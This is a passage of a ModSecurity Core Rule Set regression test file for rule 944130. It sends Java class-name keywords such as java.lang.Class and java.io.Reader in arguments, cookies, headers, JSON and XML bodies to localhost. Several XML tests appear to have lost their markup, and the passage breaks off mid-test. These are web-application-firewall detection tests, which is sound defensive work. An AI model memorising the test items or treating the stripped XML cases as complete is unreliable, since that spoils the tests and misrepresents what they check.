Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-248 + desc: "XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-249 + desc: "Nested XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-250 + desc: "Content-Type text/plain includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-251 + desc: "Content-Type application/json arg value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-252 + desc: "Content-Type application/json arg name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-253 + desc: "Argument test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-254 + desc: "Argument name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-255 + desc: "Cookie test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-256 + desc: "Cookie name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-257 + desc: "Request header test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-258 + desc: "XML attribute value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-259 + desc: "XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-260 + desc: "Nested XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-261 + desc: "Content-Type text/plain includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-262 + desc: "Content-Type application/json arg value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-263 + desc: "Content-Type application/json arg name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-264 + desc: "Argument test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-265 + desc: "Argument name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-266 + desc: "Cookie test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-267 + desc: "Cookie name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-268 + desc: "Request header test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-269 + desc: "XML attribute value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-270 + desc: "XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-271 + desc: "Nested XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-272 + desc: "Content-Type text/plain includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-273 + desc: "Content-Type application/json arg value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-274 + desc: "Content-Type application/json arg name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-275 + desc: "Argument test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-276 + desc: "Argument name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-277 + desc: "Cookie test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-278 + desc: "Cookie name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-279 + desc: "Request header test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-280 + desc: "XML attribute value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-281 + desc: "XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-282 + desc: "Nested XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-283 + desc: "Content-Type text/plain includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-284 + desc: "Content-Type application/json arg value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-285 + desc: "Content-Type application/json arg name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-286 + desc: "Argument test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-287 + desc: "Argument name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-288 + desc: "Cookie test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-289 + desc: "Cookie name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-290 + desc: "Request header test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-291 + desc: "XML attribute value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-292 + desc: "XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-293 + desc: "Nested XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-294 + desc: "Content-Type text/plain includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 